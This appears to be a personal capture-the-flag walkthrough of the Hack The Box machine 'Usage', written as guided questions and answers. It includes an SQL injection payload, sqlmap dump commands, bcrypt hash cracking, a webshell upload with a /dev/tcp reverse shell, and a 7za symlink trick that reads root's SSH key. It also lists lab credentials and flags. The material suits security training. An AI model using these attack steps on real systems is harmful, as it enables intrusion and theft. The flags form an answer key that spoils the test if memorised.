Guided:
Q: How many open TCP ports are listening on Usage?
A: 2

Q: What domain name is a subdomain of usage.htb that returns a different page than the default redirect to usage.htb?
A: admin.usage.htb

Q: What PHP web framework is the website written with?
A: laravel
'Whatweb' hints it

Q: What is the HTTP POST parameter that is vulnerable to SQL injection?
A: email            (From the "reset password")
Note: specificly this payload worked for me --> admin' or 1=1;-- -
and sqlmap did the rest with the request file,
python3 sqlmap.py -r ~/HTB/Usage/req -p email --dbs --batch --level 3 --threads=10

Q: How many tables are in the usage_blog database?
A: 15
python3 sqlmap.py -r ~/HTB/Usage/req -p email -D usage_blog --tables --batch --level 3 --threads=10

Q: What is the admin user's password to the admin website?
A: whatever1
Note: cracked the pass i got from mysql, it was "bcrypt $2*$, Blowfish (Unix)" 
hashcat -m 3200 -a 0 <pass file> -w <wordlist>
$2y$10$ohq2kLpBH/ri.P5wR0P3UOmc24Ydvl9DA9H1S6ooOMgH5xVfUPrL2:whatever1

Q: What PHP package is responsible for the admin panel?
A: laravel-admin
(it was the only one in the dashboard with version without '^')

Q: What is the 2023 CVE ID for an arbitrary file upload vulnerability that leads to remote code execution in this version of Laravel-Admin?
A: CVE-2023-24249
Note: all was needed is to upload an webshell as img,example 'img.jpg' and intercept it with burp and add .php to the ending of the file name, base64 encode /dev/tcp and let it return back to me. 
https://flyd.uk/post/cve-2023-24249/
Also found db creds:
DB_USERNAME=staff
DB_PASSWORD=s3cr3t_c0d3d_1uth

Q: What user is the webserver running as on Usage?
A: dash

Q: Submit the flag located in the dash user's home directory.
A: d9c8a6560b30788db2cb18c7530c5c97

Q: What is the xander user's password on Usage?
A: 3nc0d3d_pa$$w0rd
Found in a hidden file in home directory, named '.monitrc'

Q: What is the full path of the file that xander can run as any user without a password on Usage?
A: /usr/bin/usage_management

Q: Which option in usage_management invokes 7Zip?
A: 1
(strings /usr/bin/usage_management)

Q: What is the full command line for 7Zip when it is invoked by usage_management?
A: /usr/bin/7za a /var/backups/project.zip -tzip -snl -mmt -- *
Note: it created a backup on the dir /var/www/html , had to make a link file to root's ssh.
touch @id_rsa      ((also referred to as a listfile) tells 7zip that id_rsa contains a list of files to be compressed)
ln -s /root/.ssh/id_rsa id_rsa          7za will read the content of the ssh key instead of backup. (not sure why)

Q: What is the full path to the root user's private SSH key?`
A: /root/.ssh/id_rsa

Q: Submit the flag located in the root user's home directory.
A: 2b28cc49318e6a9ac83f0f936f3ac07b
